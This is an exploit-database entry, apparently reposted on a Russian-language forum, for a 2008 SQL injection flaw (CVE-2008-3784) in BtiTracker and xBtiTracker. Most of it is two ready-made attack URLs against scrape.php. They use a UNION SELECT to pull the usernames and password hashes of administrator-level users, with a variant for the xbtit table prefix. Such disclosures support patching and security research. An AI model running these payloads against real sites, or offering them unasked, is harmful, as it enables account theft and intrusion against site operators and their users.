- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 6296
- Проверка EDB
-
- Пройдено
- Автор
- INATEAM
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-3784
- Дата публикации
- 2008-08-25
Код:
## BtiTracker/xBtiTracker Remote SQL Injection Vulnerability
## Author: InATeam (http://inattack.ru/)
## Affected versions: BtiTracker <= 1.4.7, xBtiTracker <= 2.0.542
## Software site: http://www.btiteam.org/
##
## ==============================================================================
## Exploit:
## ==============================================================================
## http://site/scrape.php?info_hash=1%27)
## +UNION+SELECT+0,CONCAT(0x3C623E,username,0x3a,password,0x3C2F623E3C62723E),0,0
## +FROM+users+WHERE+id_level=8/*
## ==============================================================================
## for xBtiTracker we need to specify prefix:
## ==============================================================================
## http://site/scrape.php?info_hash=1%27)
## +UNION+SELECT+0,CONCAT(0x3C623E,username,0x3a,password,0x3C2F623E3C62723E),0,0
## +FROM+xbtit_users+WHERE+id_level=8/*
## ==============================================================================
# milw0rm.com [2008-08-25]- Источник
- www.exploit-db.com
